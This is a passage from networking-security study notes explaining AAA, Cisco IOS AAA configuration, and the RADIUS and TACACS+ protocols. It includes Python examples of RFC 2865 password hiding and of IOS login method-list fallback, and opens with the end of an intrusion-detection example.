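    baseline = build_baseline(parse_log(TRAINING_LOG))
    live = parse_log(LIVE_LOG)
    return {"baseline": baseline,
            "signature": signature_alerts(live),
            "anomaly": anomaly_alerts(live, baseline)}
```

The baseline learned from the training log is 4 requests per source (std floored to 1), so the limit is 7: the scanner at 30 requests is flagged while the single exploit request from 203.0.113.4 is invisible to the anomaly rule and is caught only by the signatures. That complementarity, and the fact that a too-low `k` would flag the legitimate user with two requests on a quieter baseline, is the false-positive trade-off section 24 describes.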
25.AAA (Authentication, Authorization, and Accounting)
AAA is a security framework used to control access to network resources, enforce
policies, and audit usage. It consists of three core components:
Authentication:
 What it is: The process of verifying the identity of a user, device, or
process attempting to access a system or network resource. "Are you who
you say you are?"
 How it works: Typically involves challenging the entity for credentials (e.g.,
username/password, digital certificate, token) and validating them against
a database.
 Outcome: Grants or denies initial access based on successful identity
verification.
Authorization:
 What it is: The process of determining what an authenticated entity is
permitted to do or access after they have been successfully authenticated.
"Now that I know who you are, what are you allowed to do?"
 How it works: Applies specific permissions, privileges, or restrictions based
on the authenticated identity's role, group membership, or other
attributes.
 Examples: Allowing a user to execute certain commands on a router,
access specific files, or use particular network services, while restricting
other actions.
Accounting (Traceability):
 What it is: The process of collecting and logging information about the
activities of authenticated entities and the resources they consume. "What
did you do?"
 How it works: Records details such as login/logout times, commands
executed, data transferred, services accessed, etc.
 Purpose: Used for auditing, billing, security monitoring, incident response,
and resource management.
AAA Implementation Methods on Network Devices (e.g., Cisco Routers):
Password Only (for device access, e.g., VTY lines):
 A single, simple password configured on lines (e.g., console, VTY for
Telnet/SSH).
 Example: `line vty 0 4` then `password cisco` then `login`
 Security: Very basic, not recommended for strong security.
Local Database (for device access):
 Usernames and passwords (often encrypted) are stored directly on the
network device itself.
 Example: `username [name] secret [password]`, `line vty 0 4` then
`login local`
 Pros: Simple to set up for a few devices.
 Cons: Not scalable; requires managing user accounts individually on every
device. If you have many devices, replicating and synchronizing these
local databases is difficult and tedious.
AAA Server (Centralized AAA):
The most robust and scalable method.
User credentials, authorization policies, and accounting logs are managed on a
central AAA server (e.g., a RADIUS or TACACS+ server such as FreeRADIUS or
Cisco ISE, the successor to Cisco ACS).
Network devices (routers, switches, firewalls, APs) act as AAA clients, forwarding
authentication requests to the AAA server.
Pros:
 Centralized user and policy management.
 Scalability for large networks.
 Consistent security policies across devices.
 Detailed, centralized accounting logs.
Activation (Cisco IOS Example):
 `aaa new-model` (Enables the AAA framework globally; from this point the
VTY lines use AAA method lists instead of the plain line `password`/`login`.)
 `username [name] secret [password]` (Can still be used as a local
fallback.) Caveat: create this account before entering `aaa new-model`,
because the default method list applies to the VTY lines immediately and a
device with no local user and no reachable server locks you out; keep a
console session open while testing.
 `aaa authentication login default [method1] [method2] ...`
(Defines authentication methods. `local` uses the router's local database;
`group radius` / `group tacacs+` point to the configured AAA servers.)
 `aaa authentication attempts login max-fail [number]` (limits failed
login attempts before the session is dropped).
Configuration to define AAA server(s) (e.g., RADIUS or TACACS+ server IP, shared
secret), for example `tacacs server [name]` / `address ipv4 [ip]` /
`key [shared-secret]`, or `radius server [name]` / `address ipv4 [ip]
auth-port 1812 acct-port 1813` / `key [shared-secret]`.
Protocols for Communication with AAA Servers:
Network devices (AAA clients) communicate with AAA servers using specific
protocols:
RADIUS (Remote Authentication Dial-In User Service):
 A widely used client-server protocol for centralized Authentication,
Authorization, and Accounting.
 Developed by Livingston Enterprises in 1991; now an IETF standard (RFC 2865
for authentication/authorization, RFC 2866 for accounting).
 Transport Protocol: Operates over UDP.
 Standard ports: UDP 1812 (Authentication/Authorization), UDP 1813
(Accounting).
 Legacy ports: UDP 1645 (Authentication/Authorization), UDP 1646
(Accounting).
Characteristics:
 Combines Authentication and Authorization in the same packet exchange
(the Access-Accept carries the authorization attributes).
 Hides only the User-Password attribute (XOR with an MD5 keystream derived
from the shared secret and the Request Authenticator); the rest of the
packet, including the user name, is sent in the clear, and the reply is
protected only by an MD5-based Response Authenticator. Packets carrying EAP
must also include the HMAC-MD5 Message-Authenticator attribute (RFC 3579),
and since the 2024 "Blast-RADIUS" attack (CVE-2024-3596) servers and clients
should require it on every packet or run RADIUS over TLS/DTLS.
 Extensible through vendor-specific attributes (VSAs).
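The shared-secret mechanics described for the AP-to-RADIUS link in section 14 and the "hides only the password" characteristic above, as an added example that is not part of the original notes. It implements the RFC 2865 User-Password hiding and the Response Authenticator with the Python standard library and builds a minimal Access-Request to show which fields the secret actually protects. The shared secret, Request Authenticator, user name and password are constructed test values; a real NAS draws the 16-byte authenticator from a CSPRNG for every request.

```python
"""RADIUS shared-secret mechanics per RFC 2865 (added example, stdlib only).
Shows what the shared secret protects: the User-Password attribute is hidden
with an MD5 keystream, the Response Authenticator binds the reply to the
request, and everything else (User-Name, ...) travels in the clear.
Secret, authenticator and credentials are constructed values."""
import hashlib
import hmac

ACCESS_REQUEST, ACCESS_ACCEPT = 1, 2
USER_NAME, USER_PASSWORD = 1, 2


def hide_password(password: bytes, secret: bytes, request_auth: bytes) -> bytes:
    """RFC 2865 5.2: pad with NULs to 16-byte blocks, then
    c_i = p_i XOR MD5(secret || c_{i-1}) with c_0 = the Request Authenticator."""
    padded = password + b"\x00" * (-len(password) % 16)
    out, prev = b"", request_auth
    for i in range(0, len(padded), 16):
        stream = hashlib.md5(secret + prev).digest()
        prev = bytes(p ^ s for p, s in zip(padded[i:i + 16], stream))
        out += prev
    return out


def unhide_password(hidden: bytes, secret: bytes, request_auth: bytes) -> bytes:
    """Server side: regenerate the keystream, XOR back, strip the NUL padding
    (so a password with genuine trailing NULs is not representable)."""
    out, prev = b"", request_auth
    for i in range(0, len(hidden), 16):
        stream = hashlib.md5(secret + prev).digest()
        out += bytes(c ^ s for c, s in zip(hidden[i:i + 16], stream))
        prev = hidden[i:i + 16]
    return out.rstrip(b"\x00")


def attribute(atype: int, value: bytes) -> bytes:
    """RADIUS attribute TLV: type, length (including the 2-byte header), value."""
    return bytes([atype, 2 + len(value)]) + value


def build_access_request(ident: int, username: bytes, password: bytes,
                         secret: bytes, request_auth: bytes) -> bytes:
    """Code(1) | ID(1) | Length(2) | Request Authenticator(16) | attributes."""
    attrs = attribute(USER_NAME, username) \
        + attribute(USER_PASSWORD, hide_password(password, secret, request_auth))
    length = 20 + len(attrs)
    return bytes([ACCESS_REQUEST, ident]) + length.to_bytes(2, "big") + request_auth + attrs


def response_authenticator(code: int, ident: int, attrs: bytes,
                           request_auth: bytes, secret: bytes) -> bytes:
    """RFC 2865 3: MD5(Code || ID || Length || RequestAuth || Attributes || Secret)."""
    length = 20 + len(attrs)
    return hashlib.md5(bytes([code, ident]) + length.to_bytes(2, "big")
                       + request_auth + attrs + secret).digest()


def verify_response(packet: bytes, request_auth: bytes, secret: bytes) -> bool:
    """NAS side: a reply whose authenticator does not verify is silently dropped."""
    code, ident, attrs = packet[0], packet[1], packet[20:]
    expected = response_authenticator(code, ident, attrs, request_auth, secret)
    return hmac.compare_digest(packet[4:20], expected)


def demo() -> dict:
    secret = b"constructed-shared-secret"
    request_auth = bytes(range(16))          # constructed; random per request in practice
    username, password = b"alice", b"correct horse battery staple"
    req = build_access_request(7, username, password, secret, request_auth)
    hidden = req[20 + 2 + len(username) + 2:]   # value bytes of the User-Password TLV
    # Server reply: Access-Accept with no attributes, authenticator over the request.
    accept = bytes([ACCESS_ACCEPT, 7]) + (20).to_bytes(2, "big") \
        + response_authenticator(ACCESS_ACCEPT, 7, b"", request_auth, secret)
    forged = accept[:4] + b"\x00" * 16        # a reply from someone without the secret
    return {
        "username_visible": username in req,
        "password_visible": password in req,
        "recovered": unhide_password(hidden, secret, request_auth),
        "wrong_secret": unhide_password(hidden, b"other", request_auth),
        "accept_ok": verify_response(accept, request_auth, secret),
        "forged_ok": verify_response(forged, request_auth, secret),
    }
```

The user name is a plain substring of the packet while the password is not, which is exactly the "only the password" property; the forged Access-Accept fails because its authenticator was not computed with the secret. Note that this protection is MD5-based and the hiding is a stream cipher keyed from the secret, so a weak or shared-across-devices secret, or RADIUS exposed beyond a management VLAN, undermines all of it.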
TACACS+ (Terminal Access Controller Access-Control System Plus):
 A Cisco-designed protocol, later published by the IETF as RFC 8907
(Informational), that also provides AAA services. Evolved from earlier
TACACS and XTACACS.
 Operates over TCP port 49.
Characteristics:
 Separates AAA functions: Authentication, Authorization, and Accounting
are distinct processes and message types. This provides more flexibility.
 Obfuscates the entire packet body (not just a password) with an MD5
keystream derived from the shared secret; only the 12-byte header is in the
clear. RFC 8907 itself notes that this is not strong encryption and that
TACACS+ traffic should be confined to a protected management network.
 Provides more granular control over command authorization (can
authorize individual commands a user executes on a device).
 Often preferred for device administrative control due to its separation of
AAA functions and per-command authorization.
Choosing Between RADIUS and TACACS+:
RADIUS: Widely supported by many vendors, good for network access control
(e.g., 802.1X for Wi-Fi or wired ports).
TACACS+: Offers more granular command authorization and full packet
encryption, making it a strong choice for managing administrative access to
network devices (routers, switches, firewalls).
Authentication Method Lists:
 Define sequences of authentication methods to try. The next method in the
list is used only if the previous one returns an error (e.g., no server
reachable), not if it rejects the credentials.
 Default List: Applied to lines (e.g., VTY) if no specific list is named.
Methods to choose from in `aaa authentication login default [method1]
[method2] ...`:
 `local` (local DB)
 `group radius` / `group tacacs+` (all configured servers of that type) or
`group [server-group-name]`
 `enable` (enable secret/password)
 `none` (no authentication; fail-open, acceptable only on a physically
secured console, if at all)
Named List: Custom list applied to specific lines.
 `aaa authentication login [list_name] [method1] [method2] ...`
Applied to a line:
 `line vty 0 4`
 `login authentication [list_name]` or `login authentication default`.
Example Local AAA Configuration:
R1(config)# username admin privilege 15 secret MyStrongP@ss
R1(config)# username user1 secret UserP@ss
R1(config)# aaa new-model
R1(config)# aaa authentication login default local enable
R1(config)# aaa authentication attempts login max-fail 3
R1(config)# line vty 0 4
R1(config-line)# login authentication default
R1(config-line)# exit
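The method-list evaluation order, as an added example that is not part of the original notes and not Cisco code: a small Python model of the documented IOS rule that a later method in the list is consulted only when the earlier one returns an error (server unreachable), never when it rejects the credentials. The server group, local users and passwords are constructed; the stand-in classes model `group tacacs+`, `local` and `none` only as far as that rule needs.

```python
"""Model of IOS login method-list evaluation (added example; a simplified
model of the behaviour documented for `aaa authentication login`, not Cisco
code). Next method only on ERROR, never on FAIL. All data is constructed."""
from enum import Enum


class Result(Enum):
    PASS = "pass"
    FAIL = "fail"     # method answered and rejected the credentials
    ERROR = "error"   # method could not answer (no server reply, unknown method)


class TacacsGroup:
    """Stand-in for `group tacacs+`: a server group that may be unreachable."""
    def __init__(self, users: dict, reachable: bool = True):
        self.users, self.reachable = users, reachable

    def __call__(self, user: str, password: str) -> Result:
        if not self.reachable:
            return Result.ERROR
        return Result.PASS if self.users.get(user) == password else Result.FAIL


class LocalDb:
    """Stand-in for `local`: `username ... secret ...` entries on the device."""
    def __init__(self, users: dict):
        self.users = users

    def __call__(self, user: str, password: str) -> Result:
        return Result.PASS if self.users.get(user) == password else Result.FAIL


def none_method(user: str, password: str) -> Result:
    """Stand-in for `none`: fail-open, always accepts."""
    return Result.PASS


def authenticate(method_list: list, methods: dict, user: str, password: str):
    """Walk the list in order; returns (Result, name of the method that decided).
    Only an ERROR moves on to the next entry."""
    for name in method_list:
        method = methods.get(name)
        outcome = method(user, password) if method else Result.ERROR
        if outcome is not Result.ERROR:
            return outcome, name
    return Result.ERROR, None   # every method errored: the login is refused


def scenarios() -> dict:
    local = LocalDb({"admin": "MyStrongP@ss"})
    server = {"alice": "alicepw"}
    up = {"group tacacs+": TacacsGroup(server), "local": local, "none": none_method}
    down = {"group tacacs+": TacacsGroup(server, reachable=False),
            "local": local, "none": none_method}
    return {
        # Server answers and rejects: local is NOT consulted, even though
        # 'admin' exists locally with that password.
        "server_rejects": authenticate(["group tacacs+", "local"], up, "admin", "MyStrongP@ss"),
        # Server unreachable: fallback to the local account works as intended.
        "server_down_local": authenticate(["group tacacs+", "local"], down, "admin", "MyStrongP@ss"),
        "server_down_bad_pw": authenticate(["group tacacs+", "local"], down, "admin", "wrong"),
        # `none` as the last entry means any credentials log in once servers are down.
        "fail_open": authenticate(["group tacacs+", "none"], down, "anyone", "anything"),
        # No fallback at all: an outage locks everyone out, including valid users.
        "all_error": authenticate(["group tacacs+"], down, "alice", "alicepw"),
    }
```

The two outcomes to take away are `server_rejects` (a local admin account is not a backdoor around a working TACACS+ server) and `fail_open` (a trailing `none` turns a server outage into open access), which is why the usual production list is `group tacacs+ local` with the local account reserved for outages.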